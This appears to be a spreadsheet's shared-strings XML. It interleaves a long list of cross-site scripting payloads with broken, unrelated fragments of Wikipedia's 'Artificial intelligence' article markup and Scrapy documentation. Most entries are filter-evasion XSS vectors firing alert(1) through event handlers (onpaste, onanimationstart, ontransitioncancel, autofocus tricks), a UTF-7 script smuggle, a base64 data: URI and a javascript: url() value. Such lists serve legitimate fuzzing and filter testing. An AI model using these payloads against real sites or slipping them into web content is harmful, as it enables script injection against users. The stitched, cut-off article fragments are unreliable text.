    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;To summarize, most neural networks use some form of &lt;a href="/wiki/Gradient_descent" title="Gradient descent"&gt;gradient descent &lt;/a&gt; on a hand-created neural topology. However, some research groups, such as &lt;a href="/wiki/Uber" title="Uber"&gt;Uber &lt;/a&gt;, argue that simple &lt;a href="/wiki/Neuroevolution" title="Neuroevolution"&gt;neuroevolution &lt;/a&gt; to mutate new neural network topologies and weights may be competitive with sophisticated gradient descent approaches&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;object onpaste="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;html id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;dt id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;var onbeforecut="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">            &lt;a href="#" class="icon icon-home"&gt; Scrapy</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;sup style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;html onbeforepaste="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;frameset&gt;&lt;frame onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onmouseout="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;dir onmouseout="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Sikos, Leslie F. (June 2017). &lt;a rel="nofollow" class="external text" href="https://www.springer.com/us/book/9783319540658"&gt;&lt;i&gt;Description Logics in Multimedia Reasoning &lt;/i&gt; &lt;/a&gt;. Cham: Springer. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2F978-3-319-54066-5"&gt;10.1007/978-3-319-54066-5 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-3-319-54066-5" title="Special:BookSources/978-3-319-54066-5"&gt;&lt;bdi&gt;978-3-319-54066-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170829120912/https://www.springer.com/us/book/9783319540658"&gt;Archived &lt;/a&gt; from the original on 29 August 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Description+Logics+in+Multimedia+Reasoning&amp;amp;rft.place=Cham&amp;amp;rft.pub=Springer&amp;amp;rft.date=2017-06&amp;amp;rft_id=info%3Adoi%2F10.1007%2F978-3-319-54066-5&amp;amp;rft.isbn=978-3-319-54066-5&amp;amp;rft.aulast=Sikos&amp;amp;rft.aufirst=Leslie+F.&amp;amp;rft_id=https%3A%2F%2Fwww.springer.com%2Fus%2Fbook%2F9783319540658&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;dfn id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('');+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Russel, Stuart., Daniel Dewey, and Max Tegmark. Research Priorities for Robust and Beneficial Artificial Intelligence. AI Magazine 36:4 (2015). 8 December 2016. </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;nextid style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;q onmouseover="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpointerout=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;frameset id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/frameset&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpaste="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Logic-based"&gt;Logic-based </t>
  </si>
  <si>
    <t>&lt;fieldset id=x tabindex=1 onactivate=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;a onbeforepaste="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;image onpaste="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;base id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Objectivity_(philosophy)" title="Objectivity (philosophy)"&gt;Objectivity &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;label ondrop=alert(1) contenteditable&gt;drop here&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 6, Chapter 7. </t>
  </si>
  <si>
    <t>&lt;dir onbeforecut="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;form draggable="true" ondragstart="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Golden_years_of_AI-37"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Golden_years_of_AI_37-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dl onpointerenter=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onmouseout="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointerenter=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;blink onkeypress="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;frame onmouseover="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;a id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Tools </t>
  </si>
  <si>
    <t>&lt;select oncut="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;th onblur=alert(1) tabindex=1 id=x&gt;&lt;/th&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ol draggable="true" ondragenter="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onkeydown="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;discard onpointerup=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
    <t>&lt;big id=x tabindex=1 onfocus=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>/?param=&lt;data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=35" title="Edit section: Applications"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;mark id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Alex Graves, Santiago Fernandez, Faustino Gomez, and &lt;a href="/wiki/J%C3%BCrgen_Schmidhuber" title="Jürgen Schmidhuber"&gt;Jürgen Schmidhuber &lt;/a&gt; (2006). Connectionist temporal classification: Labelling unsegmented sequence data with recurrent neural nets. Proceedings of ICML'06, pp. 369–376. </t>
  </si>
  <si>
    <t>&lt;th onbeforecut="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;li id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/li&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>SRC="test.xml" ID=I</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/wiki/Outline_of_artificial_intelligence" title="Outline of artificial intelligence"&gt;Artificial intelligence &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;summary onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/summary&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;image draggable="true" ondragstart="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;small oncut="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;keygen style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-24"&gt;&lt;a href="#Statistical_learning"&gt;&lt;span class="tocnumber"&gt;5.4 </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;menu id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;legend draggable="true" ondrag="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;header onclick="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;dir onpointerup=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;p id=x tabindex=1 onactivate=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;code onblur=alert(1) tabindex=1 id=x&gt;&lt;/code&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;link rel="stylesheet" href="_static/css/theme.css" type="text/css" /&gt;</t>
  </si>
  <si>
    <t>&lt;figure onkeypress="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onmouseover="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="mbox-text-span"&gt;This section &lt;b&gt;needs additional citations for &lt;a href="/wiki/Wikipedia:Verifiability" title="Wikipedia:Verifiability"&gt;verification &lt;/a&gt; &lt;/b&gt;.&lt;span class="hide-when-compact"&gt; Please help &lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Artificial_intelligence&amp;amp;action=edit"&gt;improve this article &lt;/a&gt; by &lt;a href="/wiki/Help:Introduction_to_referencing_with_Wiki_Markup/1" title="Help:Introduction to referencing with Wiki Markup/1"&gt;adding citations to reliable sources &lt;/a&gt;. Unsourced material may be challenged and removed.&lt;br /&gt;&lt;small&gt;&lt;span class="plainlinks"&gt;&lt;i&gt;Find sources: &lt;/i&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.google.com/search?as_eq=wikipedia&amp;amp;q=%22Artificial+intelligence%22"&gt;"Artificial intelligence" &lt;/a&gt;&amp;#160;–&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.google.com/search?tbm=nws&amp;amp;q=%22Artificial+intelligence%22+-wikipedia"&gt;news &lt;/a&gt;&amp;#160;&lt;b&gt;· &lt;/b&gt; &lt;a rel="nofollow" class="external text" href="//www.google.com/search?&amp;amp;q=%22Artificial+intelligence%22+site:news.google.com/newspapers&amp;amp;source=newspapers"&gt;newspapers &lt;/a&gt;&amp;#160;&lt;b&gt;· &lt;/b&gt; &lt;a rel="nofollow" class="external text" href="//www.google.com/search?tbs=bks:1&amp;amp;q=%22Artificial+intelligence%22+-wikipedia"&gt;books &lt;/a&gt;&amp;#160;&lt;b&gt;· &lt;/b&gt; &lt;a rel="nofollow" class="external text" href="//scholar.google.com/scholar?q=%22Artificial+intelligence%22"&gt;scholar &lt;/a&gt;&amp;#160;&lt;b&gt;· &lt;/b&gt; &lt;a rel="nofollow" class="external text" href="https://www.jstor.org/action/doBasicSearch?Query=%22Artificial+intelligence%22&amp;amp;acc=on&amp;amp;wc=on"&gt;JSTOR &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;a id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/a&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-288"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-288"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;optgroup id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/optgroup&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;canvas draggable="true" ondragleave="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-First_AI_winter-11"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-First_AI_winter_11-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-First_AI_winter_11-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-25"&gt;&lt;a href="#Integrating_the_approaches"&gt;&lt;span class="tocnumber"&gt;5.5 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;281–315, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Advertising </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Minds%2C+Machines+and+G%C3%B6del&amp;amp;rft.btitle=Minds+and+Machines&amp;amp;rft.date=1961&amp;amp;rft.aulast=Lucas&amp;amp;rft.aufirst=John&amp;amp;rft_id=http%3A%2F%2Fusers.ox.ac.uk%2F~jrlucas%2FGodel%2Fmmg.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;canvas oncut="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;option id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;image id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;320–328 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;body draggable="true" ondragend="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;li id=x tabindex=1 onactivate=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;picture id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/picture&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="padding:0em 0.25em"&gt; &lt;/div&gt;&lt;table class="nowraplinks mw-collapsible mw-collapsed navbox-subgroup" style="border-spacing:0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onclick="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;script style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;aside onpointerenter=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>url(_x0001_javascript:alert('')</t>
  </si>
  <si>
    <t>&lt;aside onpointerout=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;597–600 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmouseenter="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;form id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/form&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Learning_in_neural_networks-238"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Learning_in_neural_networks_238-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFHinton2007"&gt;Hinton 2007 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;canvas onmouseover="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;xss onload=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onmousedown="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>Searle's &lt;a href="/wiki/Chinese_room" title="Chinese room"&gt;Chinese room &lt;/a&gt; argument:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Journal of Informetrics &lt;/i&gt;. &lt;b&gt;5 &lt;/b&gt; (4): 629–649. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.joi.2011.06.002"&gt;10.1016/j.joi.2011.06.002 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Journal+of+Informetrics&amp;amp;rft.atitle=Comparing+the+expert+survey+and+citation+impact+journal+ranking+methods%3A+Example+from+the+field+of+Artificial+Intelligence&amp;amp;rft.volume=5&amp;amp;rft.issue=4&amp;amp;rft.pages=629-649&amp;amp;rft.date=2011&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.joi.2011.06.002&amp;amp;rft.aulast=Serenko&amp;amp;rft.aufirst=Alexander&amp;amp;rft.au=Michael+Dohan&amp;amp;rft_id=http%3A%2F%2Fwww.aserenko.com%2Fpapers%2FJOI_AI_Journal_Ranking_Serenko.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;sup onmouseup="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointerleave=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t>AI research at &lt;a href="/wiki/University_of_Edinburgh" title="University of Edinburgh"&gt;Edinburgh &lt;/a&gt; and in France, birth of &lt;a href="/wiki/Prolog" title="Prolog"&gt;Prolog &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;area onkeydown="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;xss id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpointerleave=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.3/"&gt;1.3&lt;/a&gt;&lt;/dd&gt;        </t>
  </si>
  <si>
    <t>&lt;q oncut="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;aside oncopy="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;applet oncontextmenu="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;23–46, 69–81, 169–196, 235–277, 281–298, 319–345, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-323"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-323"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;big draggable="true" ondragleave="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmouseover="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;template style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;embed onmousedown="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;del draggable="true" ondrag="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;element id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-77"&gt;&lt;a href="#External_links"&gt;&lt;span class="tocnumber"&gt;15 </t>
  </si>
  <si>
    <t>&lt;div oncontextmenu="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Metaphysics" title="Metaphysics"&gt;Metaphysics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;main id=x tabindex=1 onactivate=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpointermove=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onbeforecopy="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/George_Musser" title="George Musser"&gt;George Musser &lt;/a&gt;, "&lt;a href="/wiki/Artificial_Imagination" class="mw-redirect" title="Artificial Imagination"&gt;Artificial Imagination &lt;/a&gt;:  How machines could learn &lt;a href="/wiki/Creativity" title="Creativity"&gt;creativity &lt;/a&gt; and &lt;a href="/wiki/Common_sense" title="Common sense"&gt;common sense &lt;/a&gt;, among other human qualities", &lt;i&gt;&lt;a href="/wiki/Scientific_American" title="Scientific American"&gt;Scientific American &lt;/a&gt; &lt;/i&gt;, vol. 320, no. 5 (May 2019), pp.&amp;#160;58–63. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;element onbeforepaste="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/figcaption&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;mark onmouseover="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointerdown=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onmouseup="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;div id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/div&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;map ondragover=alert(1) contenteditable&gt;drop here&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;multicol draggable="true" ondragleave="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;samp draggable="true" ondragleave="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;audio id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/audio&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-151"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-151"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;noembed onbeforecopy="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_at_MIT_in_the_60s-163"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_at_MIT_in_the_60s_163-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;col ondragover=alert(1) contenteditable&gt;drop here&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Management_cybernetics" title="Management cybernetics"&gt;Management cybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a href="/wiki/Charles_T._Rubin" title="Charles T. Rubin"&gt;Rubin, Charles &lt;/a&gt; (Spring 2003). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20120611115223/http://www.thenewatlantis.com/publications/artificial-intelligence-and-human-nature"&gt;"Artificial Intelligence and Human Nature" &lt;/a&gt;. &lt;i&gt;The New Atlantis &lt;/i&gt;. &lt;b&gt;1 &lt;/b&gt;: 88–100. Archived from &lt;a rel="nofollow" class="external text" href="http://www.thenewatlantis.com/publications/artificial-intelligence-and-human-nature"&gt;the original &lt;/a&gt; on 11 June 2012. &lt;/cite&gt;&lt;span 